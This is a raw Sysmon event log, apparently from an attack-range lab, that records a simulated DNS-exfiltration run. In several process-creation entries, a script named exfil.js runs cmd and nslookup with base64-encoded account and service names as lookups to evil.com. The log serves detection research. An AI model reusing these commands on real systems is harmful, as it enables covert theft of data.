14:16:40.059{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-6B41-000000005F02}4836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.043{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-6A41-000000005F02}4796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.043{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.043{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.043{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.043{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.043{2E1864BB-17A1-629A-783D-000000005F02}55522608C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-6A41-000000005F02}4796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.053{2E1864BB-17C8-629A-6A41-000000005F02}4796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpirp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.043{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvu.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.989{2E1864BB-17C7-629A-6841-000000005F02}27921476C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-6941-000000005F02}5088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043950Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:40.453{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=977F5FF91A7B2730A86BA282EBCE3859,SHA256=00215B659FD0768B8B00B9A58884F0BB4C4E3979DF9A859306CDACC88F003793,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.983{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.983{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.983{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.967{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-A341-000000005F02}7564C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.967{2E1864BB-17A1-629A-783D-000000005F02}55526168C:\Windows\System32\WScript.exe{2E1864BB-17C9-629A-A341-000000005F02}7564C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.982{2E1864BB-17C9-629A-A341-000000005F02}7564C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrfpe.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.967{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldfkug.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.946{2E1864BB-17C9-629A-A141-000000005F02}72647476C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-A241-000000005F02}5608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.914{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.914{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.914{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.914{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.914{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-A241-000000005F02}5608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.914{2E1864BB-17C9-629A-A041-000000005F02}78846496C:\Windows\system32\cmd.exe{2E1864BB-17C9-629A-A241-000000005F02}5608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.922{2E1864BB-17C9-629A-A241-000000005F02}5608C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C9-629A-A041-000000005F02}7884C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldfkug.tmp 2>&1 10341000x8000000000000000203378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.883{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-A141-000000005F02}7264C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.883{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-A141-000000005F02}7264C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.867{2E1864BB-17C9-629A-A141-000000005F02}72647476C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-A041-000000005F02}7884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.851{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-A141-000000005F02}7264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 